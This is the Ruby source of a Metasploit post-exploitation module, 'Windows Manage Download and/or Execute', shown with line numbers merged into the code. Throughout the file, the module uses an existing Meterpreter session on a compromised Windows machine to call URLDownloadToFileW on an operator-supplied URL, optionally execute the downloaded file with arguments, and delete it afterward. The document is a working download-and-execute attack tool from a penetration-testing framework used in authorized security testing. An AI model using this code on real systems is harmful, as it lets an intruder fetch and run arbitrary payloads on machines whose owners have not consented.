Path: blob/master/modules/post/windows/manage/download_exec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Windows Manage Download and/or Execute',13'Description' => %q{14This module will download a file by importing urlmon via railgun.15The user may also choose to execute the file with arguments via exec_string.16},17'License' => MSF_LICENSE,18'Platform' => ['win'],19'SessionTypes' => ['meterpreter'],20'Author' => ['RageLtMan <rageltman[at]sempervictus>'],21'Compat' => {22'Meterpreter' => {23'Commands' => %w[24stdapi_fs_delete_file25stdapi_fs_file_expand_path26stdapi_fs_stat27stdapi_railgun_api28stdapi_sys_config_getenv29]30}31},32'Notes' => {33'Stability' => [CRASH_SAFE],34'SideEffects' => [ARTIFACTS_ON_DISK],35'Reliability' => []36}37)38)3940register_options(41[42OptString.new('URL', [true, 'Full URL of file to download' ]),43OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]),44OptString.new('FILENAME', [false, 'Name for downloaded file' ]),45OptBool.new('OUTPUT', [true, 'Show execution output', true ]),46OptBool.new('EXECUTE', [true, 'Execute file after completion', false ]),47]48)4950register_advanced_options(51[52OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),53OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),54OptBool.new('DELETE', [true, 'Delete file after execution', false ]),55]56)57end5859# Check to see if our dll is loaded, load and configure if not6061def add_railgun_urlmon62if client.railgun.libraries.find_all { |d| d.first == 'urlmon' }.empty?63session.railgun.add_dll('urlmon', 'urlmon')64session.railgun.add_function(65'urlmon', 'URLDownloadToFileW', 'DWORD',66[67['PBLOB', 'pCaller', 'in'],68['PWCHAR', 'szURL', 'in'],69['PWCHAR', 'szFileName', 'in'],70['DWORD', 'dwReserved', 'in'],71['PBLOB', 'lpfnCB', 'inout']72]73)74vprint_good('urlmon loaded and configured')75else76vprint_status('urlmon already loaded')77end78end7980def run81# Make sure we meet the requirements before running the script, note no need to return82# unless error83return 0 if session.type != 'meterpreter'8485# get time86strtime = Time.now8788# check/set vars89url = datastore['URL']90filename = datastore['FILENAME'] || url.split('/').last9192path = datastore['DOWNLOAD_PATH']93if path.blank?94path = session.sys.config.getenv('TEMP')95else96path = session.fs.file.expand_path(path)97end9899outpath = path + '\\' + filename100exec = datastore['EXECUTE']101exec_string = datastore['EXEC_STRING']102output = datastore['OUTPUT']103remove = datastore['DELETE']104105# set up railgun106add_railgun_urlmon107108# get our file109vprint_status("Downloading #{url} to #{outpath}")110client.railgun.urlmon.URLDownloadToFileW(nil, url, outpath, 0, nil)111112# check our results113begin114out = session.fs.file.stat(outpath)115print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ")116rescue StandardError117print_error('File not found. The download probably failed')118return119end120121# Execute file upon request122if exec123begin124cmd = "\"#{outpath}\" #{exec_string}"125126print_status("Executing file: #{cmd}")127res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])128print_good(res) if output && !res.empty?129rescue StandardError => e130print_error("Unable to execute: #{e.message}")131end132end133134# remove file if needed135if remove136begin137print_status("Deleting #{outpath}")138session.fs.file.rm(outpath)139rescue StandardError => e140print_error("Unable to remove file: #{e.message}")141end142end143end144end145146147